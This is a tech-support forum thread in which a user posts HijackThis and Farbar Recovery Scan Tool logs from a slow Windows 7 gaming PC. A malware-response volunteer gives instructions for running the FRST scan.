Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

HijackThis Log: Please help Diagnose Computer unecessarily slow at times.


  • This topic is locked This topic is locked
15 replies to this topic

#1 Rainsford

Rainsford

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 09 October 2015 - 08:36 PM

Hello! I have used hijackthis many times in the past but decided I needed to give it another go as my computer seems to be unecessarily slow for whats inside it. Here is my log and thank you for helping.

 

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 8:35:40 PM, on 10/9/2015
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17496)

FIREFOX: 41.0.1 (x86 en-US)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Creative\Shared Files\CTSched.exe
C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
C:\Windows\SysWOW64\Ctxfihlp.exe
C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe
C:\Windows\SysWOW64\CTXFISPI.EXE
C:\Program Files\Alienware\Command Center\AlienwareAlienFXController.exe
E:\Steam\Steam.exe
C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher32.exe
E:\Steam\bin\steamwebhelper.exe
C:\Program Files\Alienware\Command Center\AlienFusionController.exe
E:\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_19_0_0_185.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_19_0_0_185.exe
C:\Users\Rainsford\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [CTxfiHlp] CTXFIHLP.EXE
O4 - HKLM\..\Run: [Corsair Utility Engine] "C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe" --autorun
O4 - HKCU\..\Run: [Steam] "E:\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [CreativeTaskScheduler] "C:\Program Files (x86)\Creative\Shared Files\CTSched.exe" /logon
O4 - HKCU\..\Run: [Akamai NetSession Interface] "C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe"
O4 - HKCU\..\Run: [Google Update] "C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {6C269571-C6D7-4818-BCA4-32A035E8C884} (Creative Software AutoUpdate) - http://ccfiles.creative.com/Web/softwareupdate/su/ocx/15102/CTSUEng.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://files.creative.com/Web/softwareupdate/ocx/150323/CTPID.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Alienware Fusion Service (AlienFusionService) - Alienware - C:\Program Files\Alienware\Command Center\AlienFusionService.exe
O23 - Service: Creative Audio Engine Licensing Service - Creative Labs - C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe
O23 - Service: Creative Audio Service (CTAudSvcService) - Creative Technology Ltd - C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
O23 - Service: EasyAntiCheat - EasyAntiCheat Ltd - C:\Windows\system32\EasyAntiCheat.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: NVIDIA GeForce Experience Service (GfExperienceService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
O23 - Service: NVIDIA Streamer Service (NvStreamSvc) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9465 bytes
 



BC AdBot (Login to Remove)

 


#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 10 October 2015 - 04:14 AM

Hi & :welcome: to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems. :warrior:

Before we move on, please read the following points carefully: :exclame:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1

Please run a FRST scan. This will help us diagnose your problem.

frst.pngfrstscan.png
Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#3 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 10 October 2015 - 07:40 PM

Hello deeprybka and thank you for assisting me! Here are my logs as per instructed.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-10-2015
Ran by Rainsford (administrator) on PHOTON (10-10-2015 19:35:14)
Running from C:\Users\Rainsford\Desktop
Loaded Profiles: Rainsford (Available Profiles: Rainsford)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Alienware) C:\Program Files\Alienware\Command Center\AWCCServiceController.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Valve Corporation) E:\Steam\Steam.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTSched.exe
(NVIDIA Corporation) C:\Users\Rainsford\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Akamai Technologies, Inc.) C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Corsair Components, Inc.) C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe
(Alienware) C:\Program Files\Alienware\Command Center\DoorController.exe
(Alienware) C:\Program Files\Alienware\Command Center\AlienwareAlienFXController.exe
(Valve Corporation) E:\Steam\bin\steamwebhelper.exe
(Alienware) C:\Program Files\Alienware\Command Center\ThermalController.exe
(Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher32.exe
(Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher64.exe
(Alienware) C:\Program Files\Alienware\Command Center\AlienFusionService.exe
(Alienware) C:\Program Files\Alienware\Command Center\AlienFusionController.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [Command Center Controllers] => C:\Program Files\Alienware\Command Center\AWCCStartupOrchestrator.exe [12656 2012-06-18] (Alienware)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2634872 2015-08-26] (NVIDIA Corporation)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [Corsair Utility Engine] => C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe [12844864 2015-08-28] (Corsair Components, Inc.)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Steam] => E:\Steam\steam.exe [2900560 2015-10-08] (Valve Corporation)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53655680 2015-07-28] (Skype Technologies S.A.)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [CreativeTaskScheduler] => C:\Program Files (x86)\Creative\Shared Files\CTSched.exe [53341 2006-11-17] (Creative Technology Ltd)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Google Update] => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{A558BC9F-CD7C-4861-8529-F841954FCF5D}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{B7DD6E6B-AEEB-4855-B6EE-98423CF13D93}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKU\S-1-5-21-671774419-928818983-1318283798-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_45\bin\ssv.dll [2015-05-27] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-05-27] (Oracle Corporation)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-07-27] (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15102/CTSUEng.cab
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://files.creative.com/Web/softwareupdate/ocx/150323/CTPID.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)

FireFox:
========
FF ProfilePath: C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_185.dll [2015-10-02] ()
FF Plugin: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-05-27] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-05-27] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll [2015-10-02] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-25] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-25] (NVIDIA Corporation)
FF Plugin-x32: @ogplanet.com/npOGPPlugin -> C:\Windows\system32\npOGPPlugin.dll [No File]
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @my.com/Games -> C:\Users\Rainsford\AppData\Local\MyComGames\NPMyComDetector.dll [2015-08-24] (My.com, Inc)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\Rainsford\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @talk.google.com/O1DPlugin -> C:\Users\Rainsford\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Rainsford\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-20] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\user.js [2013-08-16]
FF Plugin ProgramFiles/Appdata: C:\Users\Rainsford\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Rainsford\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Extension: Cookies Manager+ - C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2015-05-28]
FF Extension: Fasterfox - C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\Extensions\{c36177c0-224a-11da-8cd6-0800200c9a91}.xpi [2013-07-09]
FF Extension: Adblock Plus - C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-07-09]
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension => not found

Chrome:
=======
CHR Profile: C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-10]
CHR Extension: (Google Docs) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-10]
CHR Extension: (Google Drive) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-10]
CHR Extension: (YouTube) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-10]
CHR Extension: (Google Search) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-10]
CHR Extension: (Google Sheets) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-10]
CHR Extension: (EditThisCookie) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2014-11-10]
CHR Extension: (Google Docs Offline) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-08]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-10]
CHR Extension: (Gmail) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-10]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-09-29] () [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2015-01-13] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [245544 2015-07-07] (EasyAntiCheat Ltd)
S4 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [1720888 2015-08-24] (GOG.com)
S4 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6920248 2015-08-26] (GOG.com)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155192 2015-08-26] (NVIDIA Corporation)
S4 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [5267776 2014-01-22] (INCA Internet Co., Ltd.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1872504 2015-08-26] (NVIDIA Corporation)
